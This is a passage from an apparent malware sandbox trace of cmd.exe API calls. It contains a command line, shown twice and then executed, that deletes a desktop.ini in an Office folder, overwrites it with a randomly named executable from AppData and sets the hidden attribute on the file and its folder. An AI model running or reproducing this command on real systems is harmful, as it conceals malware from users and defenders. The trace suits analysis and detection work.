lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x0, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegCloseKey (hKey=0x40) returned 0x0 [0162.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9c4 | out: phkResult=0x22e9c4*=0x40) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x0, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegCloseKey (hKey=0x40) returned 0x0 [0162.477] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.477] srand (_Seed=0x5b886384) [0162.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" [0162.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" [0162.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.478] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.478] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.478] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.478] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.479] GetEnvironmentStringsW () returned 0x3826b0* [0162.479] FreeEnvironmentStringsW (penv=0x3826b0) returned 1 [0162.479] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.479] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.479] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f790, lpFilePart=0x22f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f78c*="Desktop") returned 0x18 [0162.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.479] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.479] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.480] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.480] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.480] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.480] GetEnvironmentStringsW () returned 0x380560* [0162.480] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.481] GetConsoleOutputCP () returned 0x1b5 [0162.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.481] GetUserDefaultLCID () returned 0x409 [0162.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="0") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="0") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="1") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.482] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.483] GetConsoleTitleW (in: lpConsoleTitle=0x370b48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.484] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0162.484] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0162.484] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0162.484] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0162.485] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0162.485] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0162.485] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0162.487] _wcsicmp (_String1="del", _String2=")") returned 59 [0162.487] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0162.487] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0162.487] _wcsicmp (_String1="IF", _String2="del") returned 5 [0162.487] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0162.487] _wcsicmp (_String1="REM", _String2="del") returned 14 [0162.487] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0162.490] _wcsicmp (_String1="type", _String2=")") returned 75 [0162.490] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0162.490] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0162.490] _wcsicmp (_String1="IF", _String2="type") returned -11 [0162.490] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0162.490] _wcsicmp (_String1="REM", _String2="type") returned -2 [0162.490] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0162.575] SetErrorMode (uMode=0x0) returned 0x0 [0162.575] SetErrorMode (uMode=0x1) returned 0x0 [0162.575] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x380618, lpFilePart=0x22f084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f084*="Desktop") returned 0x18 [0162.575] SetErrorMode (uMode=0x0) returned 0x1 [0162.575] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.575] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0162.583] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.585] GetLastError () returned 0x2 [0162.585] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.585] GetLastError () returned 0x2 [0162.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0x382660 [0162.768] FindClose (in: hFindFile=0x382660 | out: hFindFile=0x382660) returned 1 [0162.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.769] GetLastError () returned 0x2 [0162.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0x382660 [0162.769] FindClose (in: hFindFile=0x382660 | out: hFindFile=0x382660) returned 1 [0162.769] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0162.769] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0162.769] GetConsoleTitleW (in: lpConsoleTitle=0x22f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.769] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f248 | out: lpAttributeList=0x22f180, lpSize=0x22f248) returned 1 [0162.769] UpdateProcThreadAttribute (in: lpAttributeList=0x22f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f180, lpPreviousValue=0x0) returned 1 [0162.770] GetStartupInfoW (in: lpStartupInfo=0x22f13c | out: lpStartupInfo=0x22f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0162.770] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0162.771] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f228 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessInformation=0x22f228*(hProcess=0x50, hThread=0x4c, dwProcessId=0x720, dwThreadId=0xfb4)) returned 1 [0162.875] CloseHandle (hObject=0x4c) returned 1 [0162.875] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0162.875] GetEnvironmentStringsW () returned 0x380b50* [0162.875] FreeEnvironmentStringsW (penv=0x380b50) returned 1 [0162.875] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0162.949] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f11c | out: lpExitCode=0x22f11c*=0x0) returned 1 [0162.949] CloseHandle (hObject=0x50) returned 1 [0162.949] _vsnwprintf (in: _Buffer=0x22f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f128 | out: _Buffer="00000000") returned 8 [0162.949] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0162.949] GetEnvironmentStringsW () returned 0x382680* [0162.949] FreeEnvironmentStringsW (penv=0x382680) returned 1 [0162.949] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0162.949] GetEnvironmentStringsW () returned 0x382680* [0162.949] FreeEnvironmentStringsW (penv=0x382680) returned 1 [0162.949] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f180 | out: lpAttributeList=0x22f180) [0162.950] GetConsoleTitleW (in: lpConsoleTitle=0x22f500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e578, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e57c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e578*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0162.952] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0162.952] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0162.952] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini")) returned 0xffffffff [0162.952] GetLastError () returned 0x2 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2010 [0162.952] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0162.952] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini")) returned 0xffffffff [0162.952] GetLastError () returned 0x2 [0162.952] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x38377c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38377c) returned 0xffffffff [0162.953] GetLastError () returned 0x2 [0162.953] _get_osfhandle (_FileHandle=2) returned 0xb [0162.953] GetFileType (hFile=0xb) returned 0x2 [0162.953] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0162.953] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ef78 | out: lpMode=0x22ef78) returned 1 [0162.953] _get_osfhandle (_FileHandle=2) returned 0xb [0162.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22efac | out: lpConsoleScreenBufferInfo=0x22efac) returned 1 [0162.954] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] GetFileType (hFile=0x7) returned 0x2 [0162.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f69c | out: lpMode=0x22f69c) returned 1 [0162.955] _dup (_FileHandle=1) returned 3 [0162.955] _close (_FileHandle=1) returned 0 [0162.955] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini", _String2="con") returned -53 [0162.955] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f66c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0162.956] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0162.956] GetConsoleTitleW (in: lpConsoleTitle=0x22f49c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x22f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f000) returned 0x382810 [0162.956] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0162.956] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0162.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0162.956] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22df0c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0162.957] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] GetFileType (hFile=0x58) returned 0x1 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x22df64 | out: lpFileSizeHigh=0x22df64*=0x0) returned 0x7d600 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] GetFileType (hFile=0x50) returned 0x1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] GetFileType (hFile=0x50) returned 0x1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, 